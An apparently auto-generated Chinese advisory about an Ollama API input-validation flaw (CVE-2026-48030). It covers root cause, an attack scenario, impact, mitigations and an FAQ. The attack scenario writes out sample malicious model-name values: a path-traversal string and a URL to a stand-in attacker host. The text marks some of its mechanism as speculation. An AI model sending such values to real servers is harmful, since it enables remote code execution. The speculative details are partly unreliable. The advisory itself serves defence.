Exploit for CVE-2026-48030 exploit
CVE-2026-48030 是影响 Ollama < 0.17.1 的严重输入验证漏洞,评分 9.8,可导致远程代码执行。攻击者可通过构造恶意模型名称触发路径遍历或外部模型注入,进而控制服务器。本文提供详细技术分析、攻击场景和修复建议。
Exploit for CVE-2026-48030 exploit
📋 漏洞概述
CVE-2026-48030 影响 Ollama < 0.17.1,是一种 API 输入验证不当漏洞,可导致远程代码执行 (RCE)。
📋 基础信息
| 受影响版本 | Ollama < 0.17.1 |
| 漏洞类型 | 输入验证不当 |
| CVSS | 9.8 · Critical |
| CVE | CVE-2026-48030 |
🔬 漏洞根因
Ollama 的 HTTP API 在处理模型请求时,未对用户提供的模型名称参数进行充分验证。攻击者可以利用路径遍历或特殊字符注入,使服务器加载并执行外部恶意模型文件(推测基于同类 API 注入漏洞规律)。由于模型加载过程中缺少沙箱隔离或输入清理,导致攻击者能够绕过模型白名单限制,触发任意模型下载与代码执行。
🎯 攻击场景
1. 攻击者发现目标 Ollama 服务(版本 < 0.17.1)暴露了 /api/pull 或 /api/create 等 API 端点,且未限制模型来源。 2. 攻击者构造恶意 HTTP 请求,在模型名称字段中插入路径遍历符号(如 ../)或指向外部私有仓库的 URI,例如:{"model": "../../../tmp/malicious-model"} 或 {"model": "http://attacker.com/malicious.ollamamodel"}。 3. 服务器接收请求后,由于缺乏输入校验,直接使用该路径下载并加载模型文件。 4. 恶意模型文件中包含特制的权重或脚本,在加载时通过模型解析器触发缓冲区溢出或命令注入(推测),导致在服务器进程中执行任意代码。 5. 攻击者成功获取服务器控制权,可执行后续横向移动、数据窃取或僵尸网络植入。
💥 漏洞影响
成功利用可导致远程代码执行 (RCE),攻击者能以 Ollama 进程权限执行任意命令,完全控制服务器,进一步窃取模型数据、敏感信息或横向移动至内部网络。影响所有暴露 API 端点的 Ollama 0.17.1 以下版本实例。
🛡️ 修复建议
升级至 Ollama 0.17.1 或更高版本,该版本对模型名称输入进行了严格的路径白名单与来源验证;临时缓解措施:在反向代理层添加模型名称参数的输入校验规则,拒绝包含 ../、%2e%2e/、外部 URL 等危险模式;立即限制 API 端点的网络暴露范围,使用防火墙仅允许可信 IP 访问;若无需远程拉取,应禁用 /api/pull 等敏感端点。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-48030
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48030
- 原始来源(Sploitus)
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 1 个公开 PoC 仓库 |
⚠️ 本文由漏洞情报系统自动生成,仅供安全研究与防御参考。生成时间: 2026-05-29 08:07 | 来源: Sploitus
🤖 常见问题解答(FAQ)
❓ 如何检测是否受 CVE-2026-48030 影响?
检查 Ollama 版本:执行 `ollama --version`,若低于 0.17.1 则受影响;验证 API 端点 /api/pull 是否返回 200 且可任意指定模型名称。
❓ 漏洞利用成功的前提条件是什么?
需要目标 Ollama 服务版本低于 0.17.1 且 API 暴露于网络;攻击者能发送 HTTP 请求至服务端(通常默认监听 0.0.0.0:11434)。
❓ 临时无法升级,有什么缓解措施?
在防火墙/反向代理层丢弃包含路径遍历(../)或外部 URL 的 model 参数;限制 API 访问来源 IP;禁用 /api/pull 端点。